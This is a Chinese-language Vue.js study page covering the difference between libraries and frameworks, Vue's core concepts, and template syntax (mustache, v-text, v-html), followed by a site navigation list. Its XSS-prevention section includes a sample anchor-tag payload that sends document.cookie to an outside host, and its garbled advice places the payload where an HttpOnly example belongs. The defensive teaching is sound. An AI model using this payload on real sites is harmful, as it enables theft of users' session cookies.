>框架 和 库 的区别
`库(插件)`:是一种封装好的特定方法集合,对项目的侵入性较小,提供给开发
者使用,控制权在使用者手中,如果某个库无法完成某些需求,可以很容易切换到
其它库实现需求;
`框架`:是一套架构,会基于自身特点向用户提供一套相当完整的解决方案,而且
控制权在框架本身;对项目的侵入性较大,使用者要按照框架所规定的某种特定规
范进行开发,项目如果需要更换框架,则需要重新架构整个项目。
>vue的两个核心
>1.响应式的数据绑定:当数据发生改变,视图可以自动更新,可以不用关心dom
操作,而专心数据操作;
>2.可组合的视图组件:把视图按照功能切分成若干基本单元,组件可以一级一级组
合整个应用形成倒置组件树,可维护,可重用,可测试;
>兼容性
>Vue(2) 不支持 IE8 及以下版本,因为 Vue 使用了 IE8 无法模拟的 ECMAScript 5 特
性。但它支持所有兼容 ECMAScript 5 的浏览器。
>Vue 模板语法
* Mustache -- 双括号语法
>语法格式双大括号'{{}}',用在html标签之间,不能写在标签属性中。
>语法中可以使用js表达式,但只限于Vue实例作用域和Vue沙盒白名单,白名单规定了一些全局变量例如Math和Date。
>表达式一些基本表达式,和一些三元运算例如:`{{num + 1}}`、`{{status ? 'succeed' : 'failed'}}`、`{{changeTime()}}`、`{value.replace(/,/g,"")}`。
>不支持流控制例如:`{{ if (ok) { return message } }}`
* v-text -- 文本渲染
>v-text 能展示对应data中数据内容,也能在数据基础上做运算。
>v-text 会把标签中的内容替换。
* v-html -- html标签渲染
>将标签语义化展示在页面上
>容易产生xss攻击,请只对可信内容使用 HTML 插值,绝不要对用户提供的内容使用插值。
>如何防止xss攻击:
>>前端过滤
>>后台转义(< > `<` `>`)
>>给cookie 加上属性 http例如:
>>`<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>click</a>`
>三种将数据渲染到页面的方法总结
>* `{{}}` 最被常用但是在加载的时候会出现闪烁问题,而且只能把html标签当字符串渲染;
>* `v-text` 虽然没有数据加载闪烁问题,但是会将标签中间的数据覆盖,也不能渲染html格式数据;
>* `v-html` 谨慎使用会出现xss攻击的风险。
https://ihavenolimitations.xyz/cyyspring/vuejs/936538
- html
- 头部标签
- canvas
- md
- DOM
- git常用命令
- css
- 网站
- 默认
- 前缀
- 文本
- 图片
- 选择器
- 滚动条
- 强制横屏
- 响应式
- 动画
- animation(动画)
- transition(过渡)
- transform(变形)
- translate(移动)
- 渐变
- 鼠标
- 自定义 Web 字体
- 可视化
- echarts
- 折线图
- 区域颜色标识
- 分段显示不同颜色
- 柱状图
- 子弹图
- 分组、柱体宽度、指示器宽度
- 圓角
- 顶部显示文字
- 双轴柱状折线图
- 双轴双列柱状图
- 单个柱状图
- 多纵向坐标
- 走势图
- 横向百分比
- 最大值和最小值
- 饼图
- 嵌套
- 分组显示
- 饼图结合柱状图
- 折线结合饼图
- 关系图
- 树图
- 地图
- 标点
- 选中
- 常用
- 图片超出可拖拽
- 百度导航
- 短信验证码倒计时
- video
- TS
- 未整理
- 消失的边界线问题
- 跟随
- js
- 兼容
- 数组去重
- 解析 URL 参数为对象
- 图片懒加载
- 正则
- Photoshop
- 快捷键
- 混合模式
- vscode
- vue
- 指令